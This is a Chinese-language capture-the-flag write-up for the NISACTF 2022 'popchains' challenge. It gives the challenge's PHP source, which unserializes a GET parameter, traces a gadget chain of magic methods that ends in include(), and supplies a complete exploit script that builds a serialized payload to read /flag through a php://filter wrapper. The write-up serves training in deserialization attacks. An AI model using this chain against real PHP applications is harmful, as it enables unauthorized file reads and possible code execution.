NSS [NISACTF 2022]popchains
先看看题目,源码如下。
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']); //@为了不报错
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
服务器反序列化Road_is_Long—>Road_is_Long::wakeup()—>Road_is_Long::toString()–>Make_a_Change::get()—>Try_Work_Hard::invoke()—>Try_Work_Hard::append()
exp:
<?php
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var="php://filter/read=convert.base64-encode/resource=/flag"; //protected不能从外面赋值
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
$road1 = new Road_is_Long();
$road2 = new Road_is_Long();
$try = new Try_Work_Hard();
$make = new Make_a_Change();
$road1->page = $road2;
$road2->string=$make;
$make->effort=$try;
$jay17 = serialize($road1);
echo urlencode($jay17);